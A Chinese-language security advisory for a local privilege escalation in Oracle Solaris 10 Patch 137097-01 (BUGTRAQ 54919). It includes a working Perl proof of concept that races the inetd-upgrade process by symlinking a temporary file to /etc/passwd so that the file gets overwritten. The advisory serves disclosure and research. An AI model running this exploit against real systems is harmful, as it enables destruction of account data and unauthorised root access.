发布日期:2012-08-09
更新日期:2012-08-14
受影响系统:
Oracle Solaris 10 x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54919
Oracle Sun Solaris是一款商业性质的操作系统。
Solaris 10 Patch 137097-01在实现上存在本地权限提升漏洞,本地攻击者可利用此漏洞在受影响计算机上获取提升的权限。
<*来源:Larry Cashdollar
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Larry Cashdollar ()提供了如下测试方法:
#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
@args = split " ", $_;
if (/inetd-upgrade/) {
print "Symlinking iconf_entries.$args[1] to $clobber\n";
symlink($clobber,"/tmp/iconf_entries.$args[1]");
exit(1);
}
}
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: